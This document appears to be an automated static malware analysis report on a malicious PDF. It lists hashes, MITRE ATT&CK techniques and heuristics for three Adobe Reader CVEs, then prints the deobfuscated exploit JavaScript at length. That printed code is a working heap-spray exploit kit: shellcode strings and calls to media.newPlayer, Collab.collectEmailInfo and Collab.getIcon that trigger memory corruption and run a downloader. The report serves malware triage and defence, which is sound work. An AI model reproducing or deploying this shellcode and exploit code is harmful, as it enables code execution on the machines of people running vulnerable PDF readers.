Malicious PDF — malware analysis report

Static analysis result for SHA-256 7a687499a38129cc…

MALICIOUS

PDF

6.7 KB
MD5: 8fbce27af4f33f037f668fa6493decf9 SHA-1: 1e5258957dd98119725cebc75ae6ce1cf1a7f7b3 SHA-256: 7a687499a38129cc8f2aa43d59edafc3538787cbc34b67c6e1185fe0659061e9
476 Risk Score

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF sample contains embedded JavaScript that leverages multiple CVEs (CVE-2007-5659, CVE-2009-0927, CVE-2009-4324) to achieve code execution. The deobfuscated JavaScript indicates it is designed to download and execute a second-stage payload, as evidenced by the 'SHELLCODE' variable and calls to 'NEWPLAYER'. The ClamAV detection 'Js.Exploit.Shellcode-18' further supports this malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename, Kind, Source, Size
javascript_obj0039_000.js
1172685c6d0ed7667f0631a8616348ad780a0edc72bc3a46c04e457cfc6f4790
pdf-javascript-stream PDF /JS object 39 at offset 0x16F 20196 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
legacy_pdfkit_stage_000.js
1498a25280444fc9e04889a0622422b714ff4dc559d344fcc836b48a36a0ed2e
deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5344 bytes
Preview script
First 1,000 lines of the extracted script
legacy_pdfkit_stage_001.js
5b9713b24ca2f3ad63839b771c3e3c53bdc066d7fc4958eaf906da5deae096f6
deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5344 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3
... (truncated)